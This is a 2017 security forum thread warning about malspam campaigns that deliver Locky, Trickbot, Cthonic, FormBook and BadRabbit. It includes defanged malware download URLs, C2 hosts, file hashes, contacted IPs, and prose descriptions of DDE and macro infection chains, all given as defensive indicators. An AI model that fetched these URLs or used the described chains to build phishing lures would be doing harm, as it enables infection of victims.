This email -attachment- contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/hsbc_PaymentAdvice_doc_4_Oct_17.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0d92b1656112ed73fe98fd6c714d7959dd8ecc85759b87a6b01747a2ab0f8335/analysis/1507166812/
** https://www.hybrid-analysis.com/sample/0d92b1656112ed73fe98fd6c714d7959dd8ecc85759b87a6b01747a2ab0f8335?environmentId=100
Contacted Hosts
87.106.222.158
64.182.208.181
194.87.92.191
*** https://www.virustotal.com/en/file/ab12a6b6d3f7ab00630fbb9558b725c2d25cf59a133ee0db807eaf3e851c3e4b/analysis/1507170157/
ser1004.png
diga-consult .de: 87.106.222.158: https://www.virustotal.com/en/ip-address/87.106.222.158/information/
> https://www.virustotal.com/en/url/591dff2bb6262e18057455d99487270cb3da5d662db3de596ec573a645518c0e/analysis/
hill-familie .de: 148.251.5.116: https://www.virustotal.com/en/ip-address/148.251.5.116/information/
> https://www.virustotal.com/en/url/cf879c9b691a8a5cfe4398dc1ae885c1e999c7eeb35e7947ed0174f011227ff4/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-10-06, 14:39
FYI...
Fake 'Payment history' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/locky-freaky-friday-your-remittance-advice-with-base64-encoded-attachments-to-emails-instead-of-zip-files/
6 Oct 2017 - "... Locky downloaders... an email with the subject of 'Payment history' pretending to come from accounts @ random email addresses and companies.... encoding the files today and the so called 7z attachment is actually a base64 file that needs decoding to get the 7z file, before extracting the VBS...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Your-Remittance-Advice_-locky-email.png
62046_Remittance.7z: decoded from base 64 and Extracts to: 872042 Remittance.vbs
Current Virus total detections 9/60*. Payload Security**
This particular VBS has these URLs hardcoded (there will be loads of others)
"asheardontheradiogreens .com/uywtfgh36?”,
”thedarkpvp .net/p66/uywtfgh36″
”2-wave .com/uywtfgh36?” (virusTotal 14/66[3]) (Payload Security[4])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a53ad9751059a2c1d298cb11868c3016ebc40cb69c562d7b1d5fad1dae75e581/analysis/1507281470/
872042 Remittance.vbs
** https://www.hybrid-analysis.com/sample/a53ad9751059a2c1d298cb11868c3016ebc40cb69c562d7b1d5fad1dae75e581?environmentId=100
Contacted Hosts
216.58.213.142
74.125.160.39
199.30.241.139
91.142.170.187
209.54.62.81
3] https://www.virustotal.com/en/file/716f616221f5e45a9e45edb013ab59fdf27c000e0e6dcb77267c37f09ad75589/analysis/1507281734/
freSUUFBdtY.exe
4] https://www.hybrid-analysis.com/sample/716f616221f5e45a9e45edb013ab59fdf27c000e0e6dcb77267c37f09ad75589?environmentId=100
Contacted Hosts
173.223.106.227
asheardontheradiogreens .com: 199.30.241.139: https://www.virustotal.com/en/ip-address/199.30.241.139/information/
thedarkpvp .net: https://en.wikipedia.org/wiki/Fast_flux
2-wave .com: 209.54.62.81: https://www.virustotal.com/en/ip-address/209.54.62.81/information/
:fear::fear: :mad:
AplusWebMaster
2017-10-09, 13:51
FYI...
Fake 'Remittance Advice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/locky-mess-up-monday-still-base64-files-not-working-zips/
9 Oct 2017 - "... Locky downloaders... the same email as last Friday* with the subject of 'Your Remittance Advice' pretending to come from accounts @ random email addresses and companies...
* https://myonlinesecurity.co.uk/locky-freaky-friday-your-remittance-advice-with-base64-encoded-attachments-to-emails-instead-of-zip-files/
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Your-Remittance-Advice_-locky-email.png
43699 Remittance.7z: decoded from base 64 and Extracts to: Invoice IP8729962.vbs
Current Virus total detections 6/59*. Payload Security** | This particular VBS has these URLs hardcoded (there will be loads of others)
“anderlaw .com/8734gf3hf?”,
”scottfranch .org/p66/8734gf3hf”,
”cagliaricity .it/8734gf3hf?” (virusTotal 13/65***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5355686920487f0b58f82532217c188d9f822d1264b71cc2d71e2b85b68ebd9c/analysis/1507542515/
Invoice IP8729962.vbs
** https://www.hybrid-analysis.com/sample/5355686920487f0b58f82532217c188d9f822d1264b71cc2d71e2b85b68ebd9c?environmentId=100
Contacted Hosts
98.124.251.69
*** https://www.virustotal.com/en/file/203ee7bc02c3d2b01584efc23b5240fdbc37c56a99b17cef8983ff59f564ab18/analysis/1507543011/
MEyrCrdQK.exe
anderlaw .com: 98.124.251.69: https://www.virustotal.com/en/ip-address/98.124.251.69/information/
> https://www.virustotal.com/en/url/76b1549c600071ca63de056708c397a147600de9adbc40982bb3724057aa23e9/analysis/
scottfranch .org: https://en.wikipedia.org/wiki/Fast_flux
cagliaricity .it: 95.110.196.214: https://www.virustotal.com/en/ip-address/95.110.196.214/information/
> https://www.virustotal.com/en/url/82885e203fdf3ad7cf7d022bd97374303910223d9248fbb4b6ab33a4029bc176/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-10-10, 15:27
FYI...
'FormBook' malware...
- https://www.helpnetsecurity.com/2017/10/10/formbook-malware/
Oct 10, 2017 - "Information stealing FormBook malware is being lobbed at defense contractors, manufacturers and firms in the aerospace sector in the US and South Korea... The malware is delivered via high-volume spam campaigns and email attachments that take the form of:
- DOC/XLS files loaded with malicious macros that initiate the download of FormBook payloads
- Archive files containing FormBook executable files
- PDFs containing links to the tny .im URL-shortening service, which point to FormBook executables hosted on a staging server.
> https://www.helpnetsecurity.com/images/posts/formbook-industry.jpg
... The emails are made to look like they are coming from FedEx and DHL (with the PDF attachment), as emails delivering invoices, price quotations or purchase orders (with the malicious-macros-carrying Office files), and payment confirmations and purchase orders (archive files containing malicious executables)..."
> https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html
Oct 05, 2017
clicks-track .info: 188.209.52.47: https://www.virustotal.com/en/ip-address/188.209.52.47/information/
> https://www.virustotal.com/en/url/f496eee1eafc7c7ecb83f7538e0b835aad256932aac1a855c34df847b9e65654/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-10-11, 15:16
FYI...
Fake 'Amazon' SPAM - delivers banking trojan
- https://myonlinesecurity.co.uk/fake-amazon-associates-network-malspam-email-delivers-cthonic-banking-trojan/
11 Oct 2017 - "... malware scammers are imitating Amazon Associates to deliver their malware. An email with the subject of coming from 'Amazon Associates Network' <erikam1@ umbc .edu> with a malicious word doc or Excel XLS spreadsheet attachment delivers Cthonic banking trojan. These are coming via a -compromised- umbc .edu email account. All the sites in the malware delivery chain are -compromised- sites...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/amazon_associates-network-email.png
The link-in-the-email goes to a broken link
ttps ://www.angelbasar .de/skin/form.php it should be
https ://www.angelbasar .de/skin/form.php where it downloads Your account, statement.docm
Current Virus total detections 5/61*. Payload Security** Where you can see the same screenshots as described yesterday where the content only appears after enabling and allowing macros to run. This malware doc downloads from
http ://shirtlounge .eu/skin/priv8.exe (VirusTotal 50/62[3]) (Payload Security[4]) Cthonic banking trojan...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4ae26d1113eb2cdb0f18cedb036179cfaf0ff74e0cb6a605e4cdf357e3109a8c/analysis/1507708534/
bddca74a4da71137b8f780ff9c959a54_doc
** https://www.hybrid-analysis.com/sample/4ae26d1113eb2cdb0f18cedb036179cfaf0ff74e0cb6a605e4cdf357e3109a8c?environmentId=100
3] https://www.virustotal.com/en/file/1c950172857b52c45d8a480acd3d14b5cc1877acf0bef9aaad55ff73990fe217/analysis/
A.exe
4] https://www.hybrid-analysis.com/sample/3a1f44f289b6a2e3b3fc5bdc847bd3fe854d048636a06e89ecca931b1804678f?environmentId=100
Contacted Hosts
104.238.186.189
87.98.175.85
5.9.49.12
144.76.133.38
49.51.33.103
93.170.96.235
85.159.213.210
37.187.16.17
31.3.135.232
62.113.203.55
62.113.203.99
angelbasar .de: 82.165.238.218: https://www.virustotal.com/en/ip-address/82.165.238.218/information/
> https://www.virustotal.com/en/url/7d425575c76f387d8f7423afef9440a29fdbc361cd46a4942e0e323da8d14e3a/analysis/
shirtlounge .eu: 85.214.130.213: https://www.virustotal.com/en/ip-address/85.214.130.213/information/
> https://www.virustotal.com/en/url/9b2a3fc17029f6a53b537b4a564e787ab67a3af1177131a6a67a045fd824fd4c/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-10-12, 14:57
FYI...
Equifax website hacked again - redirects to fake Flash update
- https://arstechnica.com/information-technology/2017/10/equifax-website-hacked-again-this-time-to-redirect-to-fake-flash-update/
10/12/2017 - "In May credit reporting service Equifax's website was breached by attackers who eventually made off with Social Security numbers, names, and a dizzying amount of other details for some 145.5 million US consumers. For several hours on Wednesday the site was compromised again, this time to deliver -fraudulent- Adobe Flash updates, which when clicked, infected visitors' computers with adware that was detected by only three of 65 antivirus providers. Randy Abrams, an independent security analyst by day, happened to visit the site Wednesday evening to contest what he said was false information he had just found on his credit report. Eventually, his browser opened up a page on the domain hxxp :centerbluray .info that looked like this:
> https://cdn.arstechnica.net/wp-content/uploads/2017/10/first-flash.jpg
... he encountered the -bogus- Flash download links on at least three subsequent visits. The picture above this post is the higher-resolution screenshot he captured during one visit... The file that got delivered when Abrams clicked through is called MediaDownloaderIron.exe. This VirusTotal entry* shows only Panda, Symantec, and Webroot detecting the file as adware. This separate malware analysis from Packet Security** shows the code is highly obfuscated and takes pains to conceal itself from reverse engineering. Malwarebytes[3] flagged the centerbluray .info site as one that pushes malware, while both Eset and Avira provided similar malware warnings for one of the intermediate domains, newcyclevaults .com. In the hour this post was being reported and written, Abrams was unable to reproduce the -redirects- leading to the malicious download. It's possible Equifax has cleaned up its site. It's also possible the attackers have shut down for the night and have the ability to return at will to visit still worse misfortunes on visitors. Equifax representatives didn't respond to an e-mail that included a link to the video and sought comment for this post."
* https://www.virustotal.com/en/file/6153f429c0cedc721846e60255834ae0f43829cc6a387b766de6f301dab54eca/analysis/1506995209/
MediaDownloaderIron.exe
** https://www.hybrid-analysis.com/sample/6153f429c0cedc721846e60255834ae0f43829cc6a387b766de6f301dab54eca?environmentId=100
3] https://www.virustotal.com/en/url/f66a103e2df039c7f0b918dec692546d84d516321d5367f6b03c8c79f9251cc7/analysis/
centerbluray .info: Could not find an IP address for this domain name...
newcyclevaults .com: Could not find an IP address for this domain name...
:fear::fear: :mad:
AplusWebMaster
2017-10-17, 14:21
FYI...
Fake 'MoneyGram' SPAM - delivers java trojan
- https://myonlinesecurity.co.uk/fake-moneygram-important-transaction-query-malspam-delivers-java-trojan/
27 Oct 2017 - "... fake financial themed emails containing java adwind or Java Jacksbot attachments...
The link-in-the-email goes to a zip file which doesn’t extract. However if you rename the zip to .rar it does...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/fake-Moneygram-Important-Transaction-Query.png
The link-in-the-email goes to
http ://analab .it/TransactionQuery_10-16-2017.zip which is actually a .rar file that needs to be renamed to .rar to extract it.
TransactionQuery_10-16-2017.jar (307kb) - Current Virus total detections 19/58*. Payload Security**... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5929096cdbee19f5fced5a00d69305c788ea1f7978655b1530ab52f1ee6c5185/analysis/
TransactionQuery_10-16-2017.jar
** https://www.hybrid-analysis.com/sample/5929096cdbee19f5fced5a00d69305c788ea1f7978655b1530ab52f1ee6c5185?environmentId=100
DNS Requests
46.183.223.33: https://www.virustotal.com/en/ip-address/46.183.223.33/information/
analab .it: 62.149.205.46: https://www.virustotal.com/en/ip-address/62.149.205.46/information/
> https://www.virustotal.com/en/url/87b939095608c9dce36939f1566be3e5479d6f55286a4eac5b3acacafdcc7ff2/analysis/
___
FBI press releases
> https://www.fbi.gov/news/pressrel
10.17.2017: Twelve People Indicted Installing Credit-Card Skimmers on Gas Pumps in Five States and Stealing Account Information from Thousands
10.17.2017: Two Women, Including Former Associate Dean of Caldwell University, Admit Defrauding Veterans’ G.I. Bill
10.17.2017: Doctor Admits Billing Medicare, Other Insurers $3 Million for Therapy Services Performed by Unqualified Personnel
10.17.2017: New York Man Sentenced to 43 Months in Prison for Robbing Bergen County, New Jersey Bank
:fear::fear: :mad:
AplusWebMaster
2017-10-18, 15:55
FYI...
Fake 'Invoice' SPAM - delivers Locky or Trickbot
- https://myonlinesecurity.co.uk/necurs-downloaders-changed-to-fingerprint-the-computer-before-delivering-locky-or-trickbot/
18 Oct 2017 - "... downloaders from the Necurs botnet that deliver Locky ransomware or Trickbot banking trojan... I saw a few twitter links leading to this post on Bleeping Computer[1] saying that Locky (Necurs Downloaders) will take screenshots of the “victim’s” computer and send back error messages to base... Todays is an email pretending to come from invoicing@ random names and email addresses, with a subject like 'Invoice 009863361 10.18.2017' where the numbers are random with a blank/empty body...
One of the emails looks like:
From: Invoicing <Invoicing@ random name>
Date: Wed 18/10/2017 10:27
Subject: Invoice 009863361 10.18.2017
Attachment: Invoice 009863361 10.18.2017.7z
Body content:
totally empty blank
1] https://www.bleepingcomputer.com/news/security/necurs-malware-will-now-take-a-screenshot-of-your-screen-report-runtime-errors/
Oct 17, 2017
> https://www.symantec.com/connect/blogs/necurs-attackers-now-want-see-your-desktop
17 Oct 2017 - "... Beware of strangers offering fake invoices..."
Invoice 009863361 10.18.2017.7z: Extracts to: Invoice 364776483 10.18.2017.vbs
Current Virus total detections 10/56[2]. Payload Security [3]| JoeSandbox[4].
Thanks to various Twitter contacts (my grateful thanks to them all for their hard work and expert knowledge) we have some downloads sites delivering Locky ransomware using USA IP numbers - VirusTotal 17/56[5]. Payload Security[6] from these locations:
dbatee .gr/niv785yg
goliathstoneindustries .com/niv785yg
3overpar .com/niv785yg
pciholog .ru/niv785yg
disfrance .net/p66/niv785yg
Joesandbox was given a different binary (sandbox pcap) that is a totally different size (VirusTotal 17/66[7]) (Payload Security[8]) it looks like the file must have been cut off during download. Using a different UK IP number, one researcher was given Trickbot banking trojan (VirusTotal 21/66[9]) (Payload Security[10]) from:
envi-herzog .de/iuty56g
pac-provider .com/iuty56g
pesonamas .co.id/iuty56g
disfrance .net/p66/iuty56g
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
2] https://www.virustotal.com/en/file/d7767dfdbc9a2b607b8ae485e039d9fc910a39a80b0efe696f53a5f69d69914f/analysis/1508316046/
Invoice 364776483 10.18.2017.vbs
3] https://www.hybrid-analysis.com/sample/d7767dfdbc9a2b607b8ae485e039d9fc910a39a80b0efe696f53a5f69d69914f?environmentId=100
DNS Requests
49.51.134.78
Contacted Hosts
49.51.134.78
4] https://jbxcloud.joesecurity.org/analysis/390019/1/html
5] https://www.virustotal.com/en/file/64aae4b954766b84f8f8fdac62f7b53dcaa61b07031321a027740a4f9f0fe484/analysis/
6] https://www.hybrid-analysis.com/sample/64aae4b954766b84f8f8fdac62f7b53dcaa61b07031321a027740a4f9f0fe484?environmentId=100
7] https://www.virustotal.com/en/file/64aae4b954766b84f8f8fdac62f7b53dcaa61b07031321a027740a4f9f0fe484/analysis/
8] https://www.hybrid-analysis.com/sample/d94d3de59b3c68e82a4741a53bfec507292244c181631fa5aac70c1479dbcac2?environmentId=100
9] https://www.virustotal.com/en/file/9f6cce5b4c800f6ee2713efb58c098b2520257cac831288f576a1a4c01c1564b/analysis/
10] https://www.hybrid-analysis.com/sample/9f6cce5b4c800f6ee2713efb58c098b2520257cac831288f576a1a4c01c1564b?environmentId=100
:fear::fear: :mad:
AplusWebMaster
2017-10-19, 14:07
FYI...
Fake 'Invoice' SPAM - delivers Locky and Trickbot
- https://myonlinesecurity.co.uk/malware-delivered-via-necurs-botnet-by-dde-feature-in-microsoft-word/
19 Oct 2017 - "Another change from the Necurs botnet delivering Locky and Trickbot again today with an email with the subject of 'Emailed Invoice – 459572' (random numbers) pretending to come from random names at your own email address or company domain...
They have changed to using word docs again but they are -not- using macros but using the DDE “exploit” or feature which -allows- linked files. These are very similar to embedded ole objects but instead of the object (normally a script file) being embedded in the word doc & you clicking it to allow it to run, these link to a remote website without you seeing the link. This link describes it in better detail:
> https://blog.barkly.com/microsoft-office-malware-attack-no-macros
One of the emails looks like:
From: Stacie Osborne <Stacie@ victim domain .tld>
Date: Thu 19/10/2017 11:15
Subject: Emailed Invoice – 459572
Attachment: I_459572.doc
Body content:
As requested
regards
Stacie Osborne ...
Screenshot of word doc:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/I_459572_doc.png
I_459572.doc - Current Virus total detections 9/60*. Payload Security**
The word doc uses this DDE “feature” to contact (in this example, there will be loads of others)
http ://alexandradickman .com/KJHDhbje71 where a base64 encoded file is opened and decoded.
This has 3 hardcoded URLS inside it (again there will be others in other examples)
“http ://shamanic-extracts .biz/eurgf837or”,
”http ://centralbaptistchurchnj .org/eurgf837or”,
”http ://conxibit .com/eurgf837or” which gives a txt file which is -renamed- to rekakva32.exe
(VirusTotal 6/65[3]) (Payload Security[4])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/analysis/1508408047/
** https://www.hybrid-analysis.com/sample/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2?environmentId=100
DNS Requests
98.124.251.65
83.242.103.81
98.124.251.65
Contacted Hosts
98.124.251.65
62.212.154.98
83.242.103.81
3] https://www.virustotal.com/en/file/d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4/analysis/1508408465/
4] https://www.hybrid-analysis.com/sample/d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4?environmentId=100
Contacted Hosts
188.190.71.132
___
Fake 'eFax' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/more-fake-efax-messages-deliver-trickbot-banking-trojan/
19 Oct 2017 - "An email with the subject of 'eFax' pretending to come from eFax service but actually coming from a whole range of look-a-like domains with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan... the criminals sending these have registered various domains that look-like genuine Company, Bank, Government or message sending services...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/eFax-Trickbot-email-faxservicexx_ml.png
efax190238535-34522.doc - Current Virus total detections 4/59*. Payload Security**
This malware file downloads from
http ://acupuncturenorthwest .com/kas47.png which of course is -not- an image file but a renamed .exe file that gets renamed to Fcd-4.exe (VirusTotal 12/64[3]). An alternative download location is
http ://www.agcofruit .com/kas47.png
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/efax190238535-34522_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f89e1c298bd162716e62906e1dca9b1353d0162788f1db9ceb5daed8f3f9d30c/analysis/1508420918/
** https://www.hybrid-analysis.com/sample/f89e1c298bd162716e62906e1dca9b1353d0162788f1db9ceb5daed8f3f9d30c?environmentId=100
DNS Requests
74.50.21.13
64.182.208.184
Contacted Hosts
74.50.21.13
64.182.208.184
79.170.7.139
185.125.46.77
3] https://www.virustotal.com/en/file/ba39b1e9160333f0067862806c31cfd4f07bf9946e660a2c8f0dc045afcf884d/analysis/
Fcd-4.exe
acupuncturenorthwest .com: 74.50.21.13: https://www.virustotal.com/en/ip-address/74.50.21.13/information/
> https://www.virustotal.com/en/url/42d62a0f2fc6699369a028a20ef6bd12dc3cdc1141c23a2e6cff1a3357adfff7/analysis/
agcofruit .com: 192.185.118.67: https://www.virustotal.com/en/ip-address/192.185.118.67/information/
> https://www.virustotal.com/en/url/ade853286c9cf3cd5081bc8721c89244dbb130ee2458282e7286fa5819e70065/analysis/
___
Locky Ransomware’s Recent SPAM
- http://blog.trendmicro.com/trendlabs-security-intelligence/look-locky-ransomwares-recent-spam-activities/
Oct 19, 2017 - "... A closer look at Locky’s activities reveals a constant: the use of spam. While spam remains to be a major entry point for ransomware, others such as Cerber also employ vectors like exploit kits. Locky, however, appears to concentrate its distribution through large-scale spam campaigns regardless of the variants released by its operators/developers... We’ve also found how the scale and scope of Locky’s distribution are fueled by the Necurs botnet, a spam distribution infrastructure comprising zombified devices. It churns out a sizeable amount of spam emails carrying information stealers like Gameover ZeuS, ZBOT or Dridex, and other ransomware families such as CryptoLocker, CryptoWall, and Jaff. Necurs is Locky’s known and long-time partner in crime, and it’s no coincidence that the surge of Locky-bearing spam emails corresponds with the uptick in Necurs’ own activity. In fact, we saw that Necurs actively pushed Locky from August to October:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2017/10/locky-spam-2.jpg
It’s also worth noting that Necurs also distributed Locky via URL-only spam emails — that is, the messages didn’t have -any- attachments, but rather -links- that divert users to -compromised- websites hosting the ransomware. The use of HTMLs embedded with -links- to the -compromised- site also started gaining traction this year... the continuous changes in Locky’s use of file attachments are its way of adjusting its tools to evade or bypass traditional security. But despite the seeming variety, there are common denominators in Locky’s social engineering, particularly in the email subjects and content. They appear to have the same old flavors, but with relatively different twists. Some of the recent lures we saw were:
- Fake voice message notifications (vishing, or the use of voice-related systems in phishing attacks)
- HTML attachments posing as invoices
- Archive files masquerading as business missives from multinationals, e.g., audit and budget reports
- Fraudulent emails that involve monetary transactions such as bills, parcel/delivery confirmations, and payment receipts..."
(More detail at the trendmicro URL above.)
:fear::fear: :mad:
AplusWebMaster
2017-10-20, 15:09
FYI...
Today's crop of cyber criminal attempts to INFECT systems and PC's through E-mail gets WORSE. 'Best bet is to read these posts by "good-guy" analysts and get what you can from their research, however convoluded the criminals means have evolved, and remember the standard warnings for ALL E-mail that hits your Inbox:
"DO NOT follow the advice they give to enable macros or enable editing to see the content.
The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it."
Scanned image from MX-2600N malspam pretending to come from your own company delivers Locky ransomware using Word DDE exploit
- https://myonlinesecurity.co.uk/scanned-image-from-mx-2600n-malspam-pretending-to-come-from-your-own-company-delivers-locky-ransomware-using-word-dde-exploit/
20 Oct 2017
Fake Swift Copy message delivers fareit trojan
- https://myonlinesecurity.co.uk/fake-swift-copy-message-delivers-fareit-trojan/
20 Oct 2017
More Locky ransomware delivered via DDE exploit pretending to come from your own company or email address
- https://myonlinesecurity.co.uk/more-locky-ransomware-delivered-via-dde-exploit-pretending-to-come-from-your-own-company-or-email-address/
20 Oct 2017
Necurs Botnet malspam pushes Locky using DDE attack
- https://isc.sans.edu/forums/diary/Necurs+Botnet+malspam+pushes+Locky+using+DDE+attack/22946/
2017-10-19 - "... the DDE attack* technique has spread to large-scale distribution campaigns..."
* https://www.bleepingcomputer.com/news/security/microsoft-office-attack-runs-malware-without-needing-macros/
___
Alert (TA17-293A)
Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors
- https://www.us-cert.gov/ncas/alerts/TA17-293A
Oct 20, 2017 - "Systems Affected:
Domain Controllers
File Servers
Email Servers
Overview: This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on advanced persistent threat (APT) actions targeting government entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors. Working with U.S. and international partners, DHS and FBI identified victims in these sectors. This report contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by APT actors on compromised victims’ networks...
DHS assesses this activity as a multi-stage intrusion campaign by threat actors targeting low security and small networks to gain access and move laterally to networks of major, high value asset owners within the energy sector. Based on malware analysis and observed IOCs, DHS has confidence that this campaign is still ongoing, and threat actors are actively pursuing their ultimate objectives over a long-term campaign. The intent of this product is to educate network defenders and enable them to identify and reduce exposure to malicious activity..."
(More detail at the us-cert URL above.)
:fear::fear: :mad:
AplusWebMaster
2017-10-23, 12:30
FYI...
Fake 'Office 365 update' SPAM - delivers Trojan
- https://myonlinesecurity.co.uk/fake-office-365-update-malspam-delivers-cthonic-banking-trojan/
23 Oct 2017 - "... an email with the subject of 'Office 365' pretending to come from Microsoft Security Team but actually coming via what looks like a compromised email account...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Office_365_cthonic.png
office_security_update.zip: Extracts to: ms_office_update.exe - Current Virus total detections 13/67*.
Payload Security**...
Update: after digging around the mail server quarantine, I have found several of these, coming via numerous different -compromised- email accounts. All of them have the same malformed content with no accessible attachment... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7be8966df205b91f95f3c56ef972be0264b35c865450fb69b9861fd82748e69b/analysis/1508670171/
ms_office_update.exe
** https://www.hybrid-analysis.com/sample/7be8966df205b91f95f3c56ef972be0264b35c865450fb69b9861fd82748e69b?environmentId=100
DNS Requests
35.189.99.49
Contacted Hosts
45.63.25.55
5.9.49.12
87.98.175.85
141.138.157.53
45.63.99.180
45.32.28.232
108.61.164.218
45.56.117.118
23.94.5.133
51.255.48.78
35.189.99.49
144.76.133.38
:fear::fear: :mad:
AplusWebMaster
2017-10-24, 15:38
FYI...
'BadRabbit' ransomware attacks...
> https://www.bleepingcomputer.com/news/security/bad-rabbit-ransomware-outbreak-hits-eastern-europe/
Oct 24, 2017 - "A new ransomware strain named 'Bad Rabbit' is wreaking havoc in many Eastern European countries, affecting both government agencies and private businesses alike. At the time of writing, the ransomware has hit countries such as Russia, Ukraine, Bulgaria, and Turkey. The speed with which Bad Rabbit spread is similar to the WannaCry and NotPetya outbreaks... ESET and Proofpoint researchers say Bad Rabbit has initially spread via -fake- Flash update packages, but the ransomware also appears to come with tools that help it move laterally inside a network, which may explain why it spread so quickly across several organizations in such a small time..."
> https://twitter.com/hashtag/BadRabbit?src=hash
> https://www.csoonline.com/article/3234691/security/badrabbit-ransomware-attacks-multiple-media-outlets.html
Oct 24, 2017
> https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/
24 Oct 2017
> https://askwoody.com/tag/badrabbit/
Oct 24, 2017
> https://www.virustotal.com/en/file/630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da/analysis/
BadRabbit.exe.virus / Uninstaller 27.0
49/66
File detail: FlashUtil.exe
Additional info:
install_flash_player.exe
___
Fake 'Invoice' SPAM - using 'DDE exploit'
- https://myonlinesecurity.co.uk/another-locky-ransomware-fake-invoice-malspam-campaign-using-dde-exploit/
24 Oct 2017 - "Another Locky ransomware campaign using the DDE exploit[1]...
1] https://www.bleepingcomputer.com/news/security/microsoft-office-attack-runs-malware-without-needing-macros/
... the word doc contains embedded -links- that use the DDE exploit to contact a remote server & get a base64 encoded string which decodes to a set of instructions to contact a list-of-urls in turn, until one responds...
Asking somebody to 'update links' seems innocent enough and many recipients will click 'yes':
Update fields warning message from DDE exploit word doc:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/update-fields.png
... many of the intermediate stages and files never get stored or kept on the victim’s computer, in fact the final Locky binary is deleted as soon as it has been run, so there are few forensic artefacts for investigation. Brad Duncan has done a Blog post at ISC explaining all this in detail[2] with examples from the earlier run.
2] https://isc.sans.edu/forums/diary/Necurs+Botnet+malspam+pushes+Locky+using+DDE+attack/22946/
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Your-Invoice-19499-Locky-ransomware-DDE-email.png
Invoice_file_921629.doc - Current Virus total detections 10/61*. Payload Security** | contacts
‘http ://transmercasa .com/JHGGsdsw6'
where it downloads to memory the base64 encoded string which decodes to give these 3 urls
http ://tatianadecastelbajac .fr/kjhgFG
http ://video.rb-webdev .de/kjhgFG
http ://themclarenfamily .com/kjhgFG
This delivers heropad64.exe (VirusTotal 51/67[3]) (Payload Security[4]) which in turn sends a post request with system fingerprints to
http ://webhotell .enivest.no/cuYT39.enc
where if the response is acceptable it then downloads the Locky ransomware file from that site in an encrypted text format and converts it to a working .exe. 6213Lq3p.exe (VirusTotal 8/67[5]).
It then autoruns it & deletes both the encrypted txt and the binary. It further contacts what looks like a C2 at
http ://gdiscoun .org ...
... easy to protect against by changing 1 simple setting in Microsoft Word (provided your company does -not- use the DDE feature to dynamically update word files with content from Excel spreadsheets etc). See HERE for details:
- https://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/#dde
... The Word doc has changed slightly since last week with a couple of blue star like images instead of just a few Russian characters or words:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Invoice_file_921629_doc.png
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/46bb448bd849212c1df99cae15984b669dc19cf16fb6ccb28b211a3d21b50f1d/analysis/1508840890/
** https://www.hybrid-analysis.com/sample/46bb448bd849212c1df99cae15984b669dc19cf16fb6ccb28b211a3d21b50f1d?environmentId=100
DNS Requests
75.98.175.70
178.216.98.139
151.236.60.40
62.50.190.101
Contacted Hosts
75.98.175.70
151.236.60.40
178.216.98.139
62.50.190.101
3] https://www.virustotal.com/en/file/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2/analysis/
4] https://www.hybrid-analysis.com/sample/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2?environmentId=100
DNS Requests
217.175.4.4
Contacted Hosts
217.175.4.4
5] https://www.virustotal.com/en/file/0f5be64bc9be27c4a9cab972f5a5879337cb8cfd155a84e62399ed34e8d5a1dc/analysis/1508841472/
6213Lq3p.exe
___
